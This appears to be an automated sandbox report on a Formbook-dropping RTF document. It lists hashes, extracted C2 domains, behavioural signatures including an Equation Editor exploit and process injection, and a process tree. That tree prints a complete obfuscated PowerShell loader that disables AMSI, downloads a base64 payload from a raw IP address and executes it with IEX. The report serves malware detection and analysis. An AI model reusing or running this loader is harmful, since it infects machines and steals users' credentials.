Analysis
-
max time kernel
147s -
max time network
24s -
platform
windows7_x64 -
resource
win7v20201028 -
submitted
21-01-2021 07:18
Static task
static1
Behavioral task
behavioral1
Sample
Inquiry No TBD-6-5659.doc.rtf
Resource
win7v20201028
Behavioral task
behavioral2
Sample
Inquiry No TBD-6-5659.doc.rtf
Resource
win10v20201028
General
-
Target
Inquiry No TBD-6-5659.doc.rtf
-
Size
2.1MB
-
MD5
1487709f7e0bd31d246132df9e334e9c
-
SHA1
6f4250f4ffa15136852127b7d9dbfeabdd85d020
-
SHA256
49615f1281e974a6f58c4dea63673b24ae8b331a3801788244710a3a19194a7a
-
SHA512
aca6e69fe09e1c8446ffee3047fa3cefc3028ff203edf4d3b964f46b538cf83af5373e0a9e971b010ac568ebddb96e27769f927a0304e5e3d27e930a091fe462
Malware Config
Extracted
formbook
http://www.raleighblacknursesrock.com/sly/
nature-nectar.com
lavenderbunch.com
itsguapo.com
silabrenda.digital
madelynmason.com
uslawyer911.com
sumarjewelry.com
therefundexperts.com
smartunity.community
jamesdalby.com
7697vip3.com
bytethug.com
f22.info
positivechargerecycling.com
srimps.net
conversica.partners
chezmireillestore.com
ukiyoservices.com
catsdungeon.com
svactionwmdp7955.com
petnosis.com
dorealgood.vote
meganpeasley.com
southafricanbands.com
donatecbb.com
coinlocaly.com
sharbay.net
nehyam.com
niviholdings.com
baielinda.com
secserve.email
primefoodny.com
coppermachines.com
shionoriginal.com
customtiletables.com
carlsondellosa.com
studiofalaise.com
mdtilenh.com
cpointsolutions.com
iteacherpreneur.com
southerngp.com
hf-te27g5.net
laligaproplayer.com
spreadwordsnotcovid.com
propertysolutionspecialist.com
instore.express
livelinecoffee.com
transfigurethis.com
sabeelfund.com
suntour-nb.com
eatonvancewateroakadvisers.info
kakavjesajt.com
zillion-ch.com
indiancoderclub.com
gymlessbakery.com
bclub.info
atqkhmlqi.icu
gatele3s.com
smb-cybersecurity-services.com
pssjzz.com
miniteco.com
yowoit.com
analytics-ocean.com
shivamshield.com
Signatures
-
Process spawned unexpected child process 1 IoCs
This typically indicates the parent process was compromised via an exploit or macro.
Processes:
Powershell.exedescription pid pid_target process target process Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 912 1196 Powershell.exe -
Formbook Payload 3 IoCs
Processes:
resource yara_rule behavioral1/memory/1700-25-0x000000000041EBA0-mapping.dmp formbook behavioral1/memory/1700-24-0x0000000000400000-0x000000000042E000-memory.dmp formbook behavioral1/memory/1904-35-0x00000000000D0000-0x00000000000FE000-memory.dmp formbook -
Blocklisted process makes network request 1 IoCs
Processes:
Powershell.exeflow pid process 6 912 Powershell.exe -
Drops file in System32 directory 1 IoCs
Processes:
Powershell.exedescription ioc process File opened for modification C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk Powershell.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
-
Suspicious use of SetThreadContext 4 IoCs
Processes:
Powershell.execalc.execscript.exedescription pid process target process PID 912 set thread context of 1700 912 Powershell.exe calc.exe PID 1700 set thread context of 1272 1700 calc.exe Explorer.EXE PID 1700 set thread context of 1272 1700 calc.exe Explorer.EXE PID 1904 set thread context of 1272 1904 cscript.exe Explorer.EXE -
Drops file in Windows directory 1 IoCs
Processes:
WINWORD.EXEdescription ioc process File opened for modification C:\Windows\Debug\WIA\wiatrace.log WINWORD.EXE -
Office loads VBA resources, possible macro or embedded object present
-
Launches Equation Editor 1 TTPs 1 IoCs
Equation Editor is an old Office component often targeted by exploits such as CVE-2017-11882.
-
Processes:
WINWORD.EXEdescription ioc process Set value (str) \REGISTRY\USER\S-1-5-21-293278959-2699126792-324916226-1000\Software\Microsoft\Internet Explorer\Toolbar\ShowDiscussionButton = "Yes" WINWORD.EXE Key created \REGISTRY\USER\S-1-5-21-293278959-2699126792-324916226-1000\Software\Microsoft\Internet Explorer\MenuExt WINWORD.EXE Key created \REGISTRY\USER\S-1-5-21-293278959-2699126792-324916226-1000\Software\Microsoft\Internet Explorer\MenuExt\Se&nd to OneNote WINWORD.EXE Key created \REGISTRY\USER\S-1-5-21-293278959-2699126792-324916226-1000\Software\Microsoft\Internet Explorer\MenuExt\E&xport to Microsoft Excel WINWORD.EXE Set value (int) \REGISTRY\USER\S-1-5-21-293278959-2699126792-324916226-1000\Software\Microsoft\Internet Explorer\MenuExt\E&xport to Microsoft Excel\Contexts = "1" WINWORD.EXE Key created \REGISTRY\USER\S-1-5-21-293278959-2699126792-324916226-1000\Software\Microsoft\Internet Explorer\Toolbar WINWORD.EXE Set value (str) \REGISTRY\USER\S-1-5-21-293278959-2699126792-324916226-1000\Software\Microsoft\Internet Explorer\MenuExt\Se&nd to OneNote\ = "res://C:\\PROGRA~2\\MICROS~1\\Office14\\ONBttnIE.dll/105" WINWORD.EXE Set value (int) \REGISTRY\USER\S-1-5-21-293278959-2699126792-324916226-1000\Software\Microsoft\Internet Explorer\MenuExt\Se&nd to OneNote\Contexts = "55" WINWORD.EXE Set value (str) \REGISTRY\USER\S-1-5-21-293278959-2699126792-324916226-1000\Software\Microsoft\Internet Explorer\MenuExt\E&xport to Microsoft Excel\ = "res://C:\\PROGRA~2\\MICROS~1\\Office14\\EXCEL.EXE/3000" WINWORD.EXE -
Suspicious behavior: AddClipboardFormatListener 1 IoCs
Processes:
WINWORD.EXEpid process 1656 WINWORD.EXE -
Suspicious behavior: EnumeratesProcesses 34 IoCs
Processes:
Powershell.execalc.execscript.exepid process 912 Powershell.exe 912 Powershell.exe 912 Powershell.exe 912 Powershell.exe 912 Powershell.exe 912 Powershell.exe 912 Powershell.exe 912 Powershell.exe 1700 calc.exe 1700 calc.exe 1700 calc.exe 1904 cscript.exe 1904 cscript.exe 1904 cscript.exe 1904 cscript.exe 1904 cscript.exe 1904 cscript.exe 1904 cscript.exe 1904 cscript.exe 1904 cscript.exe 1904 cscript.exe 1904 cscript.exe 1904 cscript.exe 1904 cscript.exe 1904 cscript.exe 1904 cscript.exe 1904 cscript.exe 1904 cscript.exe 1904 cscript.exe 1904 cscript.exe 1904 cscript.exe 1904 cscript.exe 1904 cscript.exe 1904 cscript.exe -
Suspicious behavior: MapViewOfSection 6 IoCs
Processes:
calc.execscript.exepid process 1700 calc.exe 1700 calc.exe 1700 calc.exe 1700 calc.exe 1904 cscript.exe 1904 cscript.exe -
Suspicious use of AdjustPrivilegeToken 43 IoCs
Processes:
Powershell.execalc.execscript.exedescription pid process Token: SeDebugPrivilege 912 Powershell.exe Token: SeIncreaseQuotaPrivilege 912 Powershell.exe Token: SeSecurityPrivilege 912 Powershell.exe Token: SeTakeOwnershipPrivilege 912 Powershell.exe Token: SeLoadDriverPrivilege 912 Powershell.exe Token: SeSystemProfilePrivilege 912 Powershell.exe Token: SeSystemtimePrivilege 912 Powershell.exe Token: SeProfSingleProcessPrivilege 912 Powershell.exe Token: SeIncBasePriorityPrivilege 912 Powershell.exe Token: SeCreatePagefilePrivilege 912 Powershell.exe Token: SeBackupPrivilege 912 Powershell.exe Token: SeRestorePrivilege 912 Powershell.exe Token: SeShutdownPrivilege 912 Powershell.exe Token: SeDebugPrivilege 912 Powershell.exe Token: SeSystemEnvironmentPrivilege 912 Powershell.exe Token: SeRemoteShutdownPrivilege 912 Powershell.exe Token: SeUndockPrivilege 912 Powershell.exe Token: SeManageVolumePrivilege 912 Powershell.exe Token: 33 912 Powershell.exe Token: 34 912 Powershell.exe Token: 35 912 Powershell.exe Token: SeIncreaseQuotaPrivilege 912 Powershell.exe Token: SeSecurityPrivilege 912 Powershell.exe Token: SeTakeOwnershipPrivilege 912 Powershell.exe Token: SeLoadDriverPrivilege 912 Powershell.exe Token: SeSystemProfilePrivilege 912 Powershell.exe Token: SeSystemtimePrivilege 912 Powershell.exe Token: SeProfSingleProcessPrivilege 912 Powershell.exe Token: SeIncBasePriorityPrivilege 912 Powershell.exe Token: SeCreatePagefilePrivilege 912 Powershell.exe Token: SeBackupPrivilege 912 Powershell.exe Token: SeRestorePrivilege 912 Powershell.exe Token: SeShutdownPrivilege 912 Powershell.exe Token: SeDebugPrivilege 912 Powershell.exe Token: SeSystemEnvironmentPrivilege 912 Powershell.exe Token: SeRemoteShutdownPrivilege 912 Powershell.exe Token: SeUndockPrivilege 912 Powershell.exe Token: SeManageVolumePrivilege 912 Powershell.exe Token: 33 912 Powershell.exe Token: 34 912 Powershell.exe Token: 35 912 Powershell.exe Token: SeDebugPrivilege 1700 calc.exe Token: SeDebugPrivilege 1904 cscript.exe -
Suspicious use of FindShellTrayWindow 4 IoCs
Processes:
Explorer.EXEpid process 1272 Explorer.EXE 1272 Explorer.EXE 1272 Explorer.EXE 1272 Explorer.EXE -
Suspicious use of SendNotifyMessage 4 IoCs
Processes:
Explorer.EXEpid process 1272 Explorer.EXE 1272 Explorer.EXE 1272 Explorer.EXE 1272 Explorer.EXE -
Suspicious use of SetWindowsHookEx 2 IoCs
Processes:
WINWORD.EXEpid process 1656 WINWORD.EXE 1656 WINWORD.EXE -
Suspicious use of WriteProcessMemory 23 IoCs
Processes:
EQNEDT32.EXECmD.exePowershell.exeExplorer.EXEcscript.exedescription pid process target process PID 268 wrote to memory of 1744 268 EQNEDT32.EXE CmD.exe PID 268 wrote to memory of 1744 268 EQNEDT32.EXE CmD.exe PID 268 wrote to memory of 1744 268 EQNEDT32.EXE CmD.exe PID 268 wrote to memory of 1744 268 EQNEDT32.EXE CmD.exe PID 1744 wrote to memory of 1440 1744 CmD.exe cscript.exe PID 1744 wrote to memory of 1440 1744 CmD.exe cscript.exe PID 1744 wrote to memory of 1440 1744 CmD.exe cscript.exe PID 1744 wrote to memory of 1440 1744 CmD.exe cscript.exe PID 912 wrote to memory of 1700 912 Powershell.exe calc.exe PID 912 wrote to memory of 1700 912 Powershell.exe calc.exe PID 912 wrote to memory of 1700 912 Powershell.exe calc.exe PID 912 wrote to memory of 1700 912 Powershell.exe calc.exe PID 912 wrote to memory of 1700 912 Powershell.exe calc.exe PID 912 wrote to memory of 1700 912 Powershell.exe calc.exe PID 912 wrote to memory of 1700 912 Powershell.exe calc.exe PID 1272 wrote to memory of 1904 1272 Explorer.EXE cscript.exe PID 1272 wrote to memory of 1904 1272 Explorer.EXE cscript.exe PID 1272 wrote to memory of 1904 1272 Explorer.EXE cscript.exe PID 1272 wrote to memory of 1904 1272 Explorer.EXE cscript.exe PID 1904 wrote to memory of 744 1904 cscript.exe cmd.exe PID 1904 wrote to memory of 744 1904 cscript.exe cmd.exe PID 1904 wrote to memory of 744 1904 cscript.exe cmd.exe PID 1904 wrote to memory of 744 1904 cscript.exe cmd.exe
Processes
-
C:\Windows\Explorer.EXEC:\Windows\Explorer.EXE1⤵
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
- Suspicious use of WriteProcessMemory
-
C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE"C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE" /n "C:\Users\Admin\AppData\Local\Temp\Inquiry No TBD-6-5659.doc.rtf"2⤵
- Drops file in Windows directory
- Modifies Internet Explorer settings
- Suspicious behavior: AddClipboardFormatListener
- Suspicious use of SetWindowsHookEx
-
C:\Windows\SysWOW64\cscript.exe"C:\Windows\SysWOW64\cscript.exe"2⤵
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: MapViewOfSection
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\cmd.exe/c del "C:\WINDOWS\syswow64\calc.exe"3⤵
-
C:\Program Files (x86)\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE"C:\Program Files (x86)\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding1⤵
- Launches Equation Editor
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\CmD.exeCmD.exe /C cscript %tmp%\Client.vbs AC2⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\cscript.execscript C:\Users\Admin\AppData\Local\Temp\Client.vbs AC3⤵
-
C:\Windows\System32\WindowsPowerShell\v1.0\Powershell.exePowershell $8B0111F552=[Ref].Assembly.GetType('Sy'+'stem.'+'Mana'+'gem'+'ent'+'.Autom'+'atio'+'n.A'+'m'+'si'+'Utils');$835FFE1926='4456625220575263174452554847';$9FE0AD5C66=[string](0..13|%{[char][int](53+($835FFE1926).substring(($_*2),2))})-replace ' ';$58FB808063=$8B0111F552.GetField($9FE0AD5C66,'Non^^^'.replace('^^^','Pub')+'lic,S'+'tatic');$58FB808063.SetValue($null,$true);($A72F9B815A=$A72F9B815A=Write-Host 'EC4AAB5808223EB722F9C2063ED056665AA80AC5658F9D06815720759C3EB4C4B7065724C3DEFA63DEB58FC3FA9D22121674');$4675777868585857577575748848483399393838485888585858443=@(91,82,101,102,93,46,65,115,115,101,109,98,108,121,46,71,101,116,84,121,112,101,40,39,83,121,39,43,39,115,116,101,109,46,39,43,39,77,97,110,97,39,43,39,103,101,109,39,43,39,101,110,116,39,43,39,46,65,117,116,111,109,39,43,39,97,116,105,111,39,43,39,110,46,39,43,36,40,91,67,72,65,114,93,40,57,56,45,51,51,41,43,91,99,72,65,114,93,40,49,50,52,45,49,53,41,43,91,99,104,65,82,93,40,49,49,53,41,43,91,67,72,97,82,93,40,91,66,89,116,101,93,48,120,54,57,41,41,43,39,85,116,105,108,115,39,41,46,71,101,116,70,105,101,108,100,40,36,40,91,67,104,65,114,93,40,91,98,121,116,101,93,48,120,54,49,41,43,91,99,104,97,82,93,40,91,98,89,116,69,93,48,120,54,68,41,43,91,99,104,97,114,93,40,91,98,121,84,101,93,48,120,55,51,41,43,91,99,104,65,114,93,40,49,49,48,45,53,41,43,91,99,104,65,82,93,40,91,66,89,84,69,93,48,120,52,57,41,43,91,99,72,97,82,93,40,57,54,56,48,47,56,56,41,43,91,99,72,97,82,93,40,49,48,53,41,43,91,67,104,97,114,93,40,91,98,89,116,101,93,48,120,55,52,41,43,91,67,104,97,114,93,40,91,66,89,84,69,93,48,120,52,54,41,43,91,99,104,97,114,93,40,49,52,56,45,53,49,41,43,91,99,72,65,82,93,40,57,53,53,53,47,57,49,41,43,91,67,104,65,82,93,40,49,48,56,41,43,91,67,104,65,114,93,40,54,50,54,50,47,54,50,41,43,91,67,104,65,82,93,40,91,98,89,84,69,93,48,120,54,52,41,41,44,39,78,111,110,80,117,98,108,105,99,44,83,116,97,116,105,99,39,41,46,83,101,116,86,97,108,117,101,40,36,110,117,108,108,44,36,116,114,117,101,41,59,40,36,49,68,55,56,53,70,50,56,53,67,61,36,49,68,55,56,53,70,50,56,53,67,61,87,114,105,116,101,45,72,111,115,116,32,39,69,67,52,65,65,66,53,56,48,56,50,50,51,69,66,55,50,50,70,57,67,50,48,54,51,69,68,48,53,54,54,54,53,65,65,56,48,65,67,53,54,53,56,70,57,68,48,54,56,49,53,55,50,48,55,53,57,67,51,69,66,52,67,52,66,55,48,54,53,55,50,52,67,51,68,69,70,65,54,51,68,69,66,53,56,70,67,51,70,65,57,68,50,50,49,50,49,54,55,52,39,41,59,100,111,32,123,36,112,105,110,103,32,61,32,116,101,115,116,45,99,111,110,110,101,99,116,105,111,110,32,45,99,111,109,112,32,103,111,111,103,108,101,46,99,111,109,32,45,99,111,117,110,116,32,49,32,45,81,117,105,101,116,125,32,117,110,116,105,108,32,40,36,112,105,110,103,41,59,36,66,54,55,54,56,48,65,69,49,54,32,61,32,91,69,110,117,109,93,58,58,84,111,79,98,106,101,99,116,40,91,83,121,115,116,101,109,46,78,101,116,46,83,101,99,117,114,105,116,121,80,114,111,116,111,99,111,108,84,121,112,101,93,44,32,51,48,55,50,41,59,91,83,121,115,116,101,109,46,78,101,116,46,83,101,114,118,105,99,101,80,111,105,110,116,77,97,110,97,103,101,114,93,58,58,83,101,99,117,114,105,116,121,80,114,111,116,111,99,111,108,32,61,32,36,66,54,55,54,56,48,65,69,49,54,59,36,69,55,68,69,65,56,68,66,48,51,61,32,78,101,119,45,79,98,106,101,99,116,32,45,67,111,109,32,77,105,99,114,111,115,111,102,116,46,88,77,76,72,84,84,80,59,36,69,55,68,69,65,56,68,66,48,51,46,111,112,101,110,40,39,71,69,84,39,44,39,104,116,116,112,58,47,47,57,49,46,50,49,57,46,54,49,46,50,50,52,47,109,121,47,115,101,108,108,46,106,112,103,39,44,36,102,97,108,115,101,41,59,36,69,55,68,69,65,56,68,66,48,51,46,115,101,110,100,40,41,59,36,54,55,52,69,49,54,53,67,56,51,61,91,84,101,120,116,46,69,110,99,111,100,105,110,103,93,58,58,39,85,84,70,56,39,46,39,71,101,116,83,116,114,105,110,103,39,40,91,67,111,110,118,101,114,116,93,58,58,39,70,114,111,109,66,97,115,101,54,52,83,116,114,105,110,103,39,40,36,69,55,68,69,65,56,68,66,48,51,46,114,101,115,112,111,110,115,101,84,101,120,116,41,41,124,73,96,69,96,88);[System.Text.Encoding]::ASCII.GetString($4675777868585857577575748848483399393838485888585858443)|I`E`X1⤵
- Process spawned unexpected child process
- Blocklisted process makes network request
- Drops file in System32 directory
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
-
C:\WINDOWS\syswow64\calc.exe"{path}"2⤵
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: MapViewOfSection
- Suspicious use of AdjustPrivilegeToken
Network
MITRE ATT&CK Matrix ATT&CK v6
Replay Monitor
Loading Replay Monitor...
Downloads
-
C:\Users\Admin\AppData\Local\Temp\Client.vbsMD5
20ed438b3c329a1d4807899fe1a87170
SHA13861443af59f5f85032719c35962e5194bebb746
SHA2562e881a5bd280fcbd0fb76ba305602ff7d16c730b39713060932583946f3dedab
SHA512f3e28c4844e101946057567f4f35875fc7d8e5022c0a435c797dcd6d558290cb6b3fbe4b412638402f0714927508f1ce2c9b999cd2d4783244efedcb5470e539
-
memory/268-5-0x00000000765A1000-0x00000000765A3000-memory.dmpFilesize
8KB
-
memory/744-33-0x0000000000000000-mapping.dmp
-
memory/912-19-0x0000000002720000-0x0000000002721000-memory.dmpFilesize
4KB
-
memory/912-18-0x00000000023F0000-0x00000000023F1000-memory.dmpFilesize
4KB
-
memory/912-21-0x0000000002870000-0x0000000002871000-memory.dmpFilesize
4KB
-
memory/912-20-0x000000001AD8A000-0x000000001ADA9000-memory.dmpFilesize
124KB
-
memory/912-23-0x000000001C5A0000-0x000000001C5E4000-memory.dmpFilesize
272KB
-
memory/912-11-0x000007FEFC251000-0x000007FEFC253000-memory.dmpFilesize
8KB
-
memory/912-12-0x000007FEF5DE0000-0x000007FEF67CC000-memory.dmpFilesize
9.9MB
-
memory/912-14-0x000000001AE00000-0x000000001AE01000-memory.dmpFilesize
4KB
-
memory/912-13-0x0000000001D30000-0x0000000001D31000-memory.dmpFilesize
4KB
-
memory/912-15-0x0000000001FF0000-0x0000000001FF1000-memory.dmpFilesize
4KB
-
memory/912-16-0x000000001AD80000-0x000000001AD82000-memory.dmpFilesize
8KB
-
memory/912-17-0x000000001AD84000-0x000000001AD86000-memory.dmpFilesize
8KB
-
memory/1272-29-0x0000000006920000-0x0000000006A46000-memory.dmpFilesize
1.1MB
-
memory/1272-31-0x0000000006C50000-0x0000000006D84000-memory.dmpFilesize
1.2MB
-
memory/1440-7-0x0000000000000000-mapping.dmp
-
memory/1440-10-0x0000000002700000-0x0000000002704000-memory.dmpFilesize
16KB
-
memory/1456-22-0x000007FEF7BD0000-0x000007FEF7E4A000-memory.dmpFilesize
2.5MB
-
memory/1656-2-0x0000000072D81000-0x0000000072D84000-memory.dmpFilesize
12KB
-
memory/1656-4-0x000000005FFF0000-0x0000000060000000-memory.dmpFilesize
64KB
-
memory/1656-3-0x0000000070801000-0x0000000070803000-memory.dmpFilesize
8KB
-
memory/1700-28-0x0000000000290000-0x00000000002A4000-memory.dmpFilesize
80KB
-
memory/1700-27-0x0000000000930000-0x0000000000C33000-memory.dmpFilesize
3.0MB
-
memory/1700-24-0x0000000000400000-0x000000000042E000-memory.dmpFilesize
184KB
-
memory/1700-25-0x000000000041EBA0-mapping.dmp
-
memory/1700-30-0x00000000002D0000-0x00000000002E4000-memory.dmpFilesize
80KB
-
memory/1744-6-0x0000000000000000-mapping.dmp
-
memory/1904-32-0x0000000000000000-mapping.dmp
-
memory/1904-34-0x0000000000870000-0x0000000000892000-memory.dmpFilesize
136KB
-
memory/1904-35-0x00000000000D0000-0x00000000000FE000-memory.dmpFilesize
184KB
-
memory/1904-36-0x0000000001FC0000-0x00000000022C3000-memory.dmpFilesize
3.0MB
-
memory/1904-37-0x00000000022D0000-0x0000000002363000-memory.dmpFilesize
588KB